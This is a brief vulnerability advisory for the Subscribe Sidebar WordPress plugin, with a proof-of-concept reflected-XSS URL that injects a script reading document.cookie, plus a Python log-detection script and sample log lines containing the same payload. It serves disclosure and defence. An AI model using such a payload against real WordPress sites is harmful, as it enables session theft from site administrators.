Tested against – Subscribe Sidebar plugin by Blubrry v1.3.1 | WordPress v5.4.1
Reflected XSS
[https://wordpress.org/plugins/subscribe-sidebar/](https://wordpress.org/plugins/subscribe-sidebar/)
The “status” GET parameter in “subscribe_sidebar.php” is vulnerable to reflected XSS attacks.
POC
/wp-admin/options-general.php?page=subscribe_sidebar.php&status=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
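A detection check for requests shaped like the POC above, added here as an example and not taken from the advisory or the plugin's code: it flags access-log entries that hit the plugin's settings page with HTML metacharacters in the decoded `status` value. The combined log format, the function names and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let a reflected value break out of HTML text or attribute context
MARKUP_RE = re.compile(r"[<>\"']")

def decode_fully(value, max_rounds=3):
    """Undo layered URL encoding (e.g. %253C -> %3C -> <), bounded by max_rounds."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_status(log_line):
    """Return the decoded `status` value if the request hits the plugin's
    settings page with markup characters in it, otherwise None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/wp-admin/options-general.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # decodes one layer
    if "subscribe_sidebar.php" not in params.get("page", []):
        return None
    for raw in params.get("status", []):
        value = decode_fully(raw)
        if MARKUP_RE.search(value):
            return value
    return None

# Constructed sample log lines (addresses, timestamps and the benign value are made up)
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2020:10:01:02 +0000] "GET /wp-admin/options-general.php'
    '?page=subscribe_sidebar.php&status=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E'
    ' HTTP/1.1" 200 5120',
    '198.51.100.4 - - [12/May/2020:10:03:40 +0000] "GET /wp-admin/options-general.php'
    '?page=subscribe_sidebar.php&status=updated HTTP/1.1" 200 5098',
    '198.51.100.4 - - [12/May/2020:10:04:11 +0000] "GET /wp-admin/options-general.php'
    '?page=other_plugin.php&status=%3Cb%3E HTTP/1.1" 200 4971',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hit = suspicious_status(line)
        if hit is not None:
            print("ALERT status=%r in: %s" % (hit, line[:60]))
```

Only the first sample line is flagged; the second carries a plain value and the third targets a different settings page.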